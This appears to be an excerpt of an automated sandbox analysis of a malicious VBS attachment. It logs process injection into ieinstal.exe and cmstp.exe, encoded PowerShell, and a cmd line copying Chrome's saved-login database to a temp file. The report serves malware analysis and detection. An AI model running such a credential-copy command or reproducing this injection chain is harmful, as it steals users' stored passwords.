      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD1D55
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD2D07
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED00D20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD22AE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDCDBD2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3EBB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD2B28
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD28EC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1B090
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED320A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD20A8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1002
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED0F900
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED24120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E841F
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489D466
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04802581
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A25DD
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D0D20
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A2D07
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047ED5E0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A1D55
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F6E30
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A2EF7
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489D616
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048ADFCE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A1FF1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A20A8
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA830
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A28EC
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04891002
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048AE824
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047EB090
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F4120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DF900
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A22AE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0488FA2B
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480EBB0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FAB40
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048903DA
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489DBD2
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A2B28
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00632D8F
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00632D90
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00639E60
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064DE6D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00639E5C
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064D70F
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00632FB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1ED0B150 appears 35 times
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 047DB150 appears 54 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED496E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED497A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49540 NtReadFile,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED498F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED499A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED496D0 NtCreateKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49650 NtQueryValueKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49670 NtQueryInformationProcess,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49610 NtEnumerateValueKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49FE0 NtCreateMutant,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4A770 NtOpenThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49770 NtSetInformationFile,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49760 NtOpenProcess,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4A710 NtOpenProcessToken,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49730 NtQueryVirtualMemory,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED495D0 NtClose,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED495F0 NtQueryInformationFile,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49560 NtWriteFile,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4AD30 NtSetContextThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49520 NtWaitForSingleObject,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A80 NtOpenDirectoryObject,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A10 NtQuerySection,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4A3B0 NtGetContextThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49B00 NtSetValueKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED498A0 NtWriteVirtualMemory,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4B040 NtSuspendThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49820 NtEnumerateKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED499D0 NtCreateProcessEx,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048195D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819560 NtWriteFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048196D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048196E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819610 NtEnumerateValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819770 NtSetInformationFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048199A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819B00 NtSetValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048195F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481AD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048197A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481A710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481A770 NtOpenThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048198A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048198F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481B040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048199D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481A3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A370 NtCreateFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A420 NtReadFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A4A0 NtClose,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A550 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A36B NtCreateFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A41A NtReadFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A49A NtClose,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A54B NtAllocateVirtualMemory,
      Source: MTIR22024323_0553381487_20220112120005.vbsInitial sample: Strings found which are bigger than 50
      Source: MTIR22024323_0553381487_20220112120005.vbsReversingLabs: Detection: 12%
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220113
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\FORSVARL.dat
      Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@25/17@2/2
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"
Source: C:\Windows\SysWOW64\cmstp.exeFile written: C:\Users\user\AppData\Roaming\O118090C\O11logri.ini
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: Window RecorderWindow detected: More than 3 window changes detected